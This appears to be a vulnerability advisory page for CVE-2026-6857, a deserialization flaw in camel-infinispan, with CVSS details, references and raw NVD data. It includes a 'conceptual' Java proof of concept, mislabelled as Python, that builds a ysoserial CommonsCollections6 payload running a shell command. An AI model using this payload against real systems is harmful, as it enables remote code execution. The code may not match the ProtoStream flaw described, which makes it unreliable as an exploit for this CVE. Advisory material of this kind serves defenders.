CVE-2026-6857

Description

A flaw was found in camel-infinispan. This vulnerability involves unsafe deserialization in the ProtoStream remote aggregation repository. A remote attacker with low privileges could exploit this by sending specially crafted data, leading to arbitrary code execution. This allows the attacker to gain full control over the affected system, impacting its confidentiality, integrity, and availability.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

camel-infinispan (具体受影响版本请参考厂商安全公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * Conceptual PoC for Unsafe Deserialization in camel-infinispan
 * This demonstrates how a malicious object might be serialized and sent.
 */

import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import ysoserial.payloads.ObjectPayload;

public class CVE2026_6857_PoC {
    public static void main(String[] args) throws Exception {
        // Generate a malicious payload using a gadget chain (e.g., CommonsCollections6)
        // Note: Classpath must contain the vulnerable library and the gadget dependency
        ObjectPayload payload = ObjectPayload.Utils.getPayload("CommonsCollections6", "touch /tmp/pwned");
        
        // Serialize the malicious object
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);
        oos.writeObject(payload);
        oos.flush();
        
        byte[] serializedData = bos.toByteArray();
        
        // In a real attack, 'serializedData' would be sent to the ProtoStream endpoint
        System.out.println("Malicious payload generated. Length: " + serializedData.length);
        // sendToTarget(serializedData);
    }
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-6857
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-6857
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-6857/
[4] VulDB https://vuldb.com/cve/CVE-2026-6857
[5] https://access.redhat.com/errata/RHSA-2026:17668
[6] https://access.redhat.com/security/cve/CVE-2026-6857
[7] https://bugzilla.redhat.com/show_bug.cgi?id=2460003

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-6857", "sourceIdentifier": "[email protected]", "published": "2026-04-22T13:16:22.583", "lastModified": "2026-05-21T15:16:30.200", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in camel-infinispan. This vulnerability involves unsafe deserialization in the ProtoStream remote aggregation repository. A remote attacker with low privileges could exploit this by sending specially crafted data, leading to arbitrary code execution. This allows the attacker to gain full control over the affected system, impacting its confidentiality, integrity, and availability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:17668", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-6857", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460003", "source": "[email protected]"}]}}